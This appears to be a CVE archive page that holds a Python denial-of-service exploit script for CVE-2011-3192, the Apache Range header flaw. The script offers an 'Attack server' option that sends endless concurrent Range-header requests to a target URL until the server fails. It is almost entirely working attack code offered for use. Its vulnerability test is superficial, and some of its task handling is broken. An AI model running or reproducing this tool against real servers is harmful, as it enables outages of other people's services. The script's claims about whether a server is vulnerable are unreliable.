4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import argparse
import aiohttp
import asyncio
from colorama import Fore
import signal


class ApacheRangeDosExploiter:
    def __init__(self, target_url, processes):
        self.target_url = target_url
        self.processes = processes
        self.byte_ranges = ["0-1023", "1024-2047", "2048-3071"]
        self.active_tasks = []

    @staticmethod
    def intro():
        print(Fore.CYAN + '____________________________')
        print(Fore.CYAN + '| Exploit by futurefkslaves |')
        print(Fore.CYAN + '____________________________')
        print(Fore.GREEN + '|   Please select options   |')
        print(Fore.YELLOW + '| 1.   Test CVE-2011-3192   |')
        print(Fore.RED + '| 2.    Attack server       |')
        print(Fore.RED + '|  enter CTRL+C for exit    |')
        print(Fore.RED + '_____________________________')

    async def test_server_vulnerability(self):
        async with aiohttp.ClientSession() as session:
            for byte_range in self.byte_ranges:
                headers = {"Range": "bytes=" + byte_range}
                try:
                    async with session.get(self.target_url, headers=headers) as response:
                        if response.status == 206:
                            print(Fore.GREEN + f"Server is vulnerable to CVE-2011-3192")
                        else:
                            print(Fore.RED + f"Server is not vulnerable with byte range: {byte_range}")
                except aiohttp.ClientError as e:
                    print(Fore.RED + f"Error occurred while testing byte range {byte_range}: {e}")

    async def exploit_byte_range(self, session, byte_range):
        headers = {"Range": "bytes=" + byte_range}
        try:
            while True:
                async with session.get(self.target_url, headers=headers) as response:
                    if response.status == 206:
                        print(Fore.GREEN + f"Successfully attacked")
                    elif response.status in [500, 404, 400, 502]:
                        print(Fore.YELLOW + f"Server down with status code {response.status}")
                        return
                    else:
                        print(Fore.RED + f"Request failed")
        except aiohttp.ClientError as e:
            print(Fore.RED + f"Error occurred while sending request in ({byte_range}): {e}")

    async def exploit_apache_range_dos(self):
        async with aiohttp.ClientSession() as session:
            tasks = []
            for _ in range(self.processes):
                for byte_range in self.byte_ranges:
                    task = asyncio.create_task(self.exploit_byte_range(session, byte_range))
                    tasks.append(task)
            try:
                await asyncio.gather(*tasks)
            except asyncio.CancelledError:
                pass


def exit_handler(signum, frame):
    print(Fore.RED + "Exiting...")
    for task in exploiter.active_tasks:
        task.cancel()
    loop.stop()
    raise SystemExit


if __name__ == "__main__":
    loop = asyncio.get_event_loop()

    parser = argparse.ArgumentParser(description="Apache Range Header DoS Exploiter")
    parser.add_argument("target", help="Target URL to test/exploit")
    parser.add_argument("processes", type=int, help="Number of concurrent attack processes")
    args = parser.parse_args()

    exploiter = ApacheRangeDosExploiter(args.target.strip(), args.processes)
    exploiter.intro()
    signal.signal(signal.SIGINT, exit_handler)

    try:
        option = input("Enter the option : ").strip()
    except KeyboardInterrupt:
        raise SystemExit

    if option == "1":
        try:
            loop.run_until_complete(exploiter.test_server_vulnerability())
        except Exception:
            raise SystemExit
    elif option == "2":
        try:
            loop.run_until_complete(exploiter.exploit_apache_range_dos())
        except Exception:
            raise SystemExit
    else:
        print(Fore.RED + "Invalid option. Please select a valid option.")

    loop.run_until_complete(asyncio.gather(*exploiter.active_tasks))